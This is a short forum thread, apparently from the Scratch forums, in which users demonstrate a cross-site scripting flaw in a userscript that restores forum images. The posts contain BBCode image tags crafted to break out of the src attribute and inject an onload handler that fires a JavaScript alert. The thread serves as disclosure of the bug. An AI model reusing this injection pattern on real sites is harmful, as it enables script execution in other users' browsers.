Anybody using the image userscript, look at this!
[img]http://scratch.mit.edu/img/bg_button.png" onload="javascript:alert('rookwood101s image support script is not XSS secure, it is better to disable it!');" /><img src="[/img]
[i//mg]http://scratch.mit.edu/img/bg_button.png" onload="javascript:alert('rookwood101s image support script is not XSS secure, it is better to disable it!');" /><img src="[/i//\\mg]
Last edited by waveOSBeta (2012-01-08 11:00:44)
Offline
[img]http://scratch.mit.edu/img/bg_button.png" onload="javascript:alert('rookwood101s image support script is not XSS secure, it is better to disable it!');" /><img src="[/img]
Last edited by waveOSBeta (2012-01-08 11:00:23)
Offline
If you have antidote, rockwood101's browser extension that brings back forum images, those codes bring up dialog boxes.
Edit: However, I think rockwood101 fixed that bug because it might be a security vulnerability.
Last edited by zippynk (2012-01-08 11:12:23)
Offline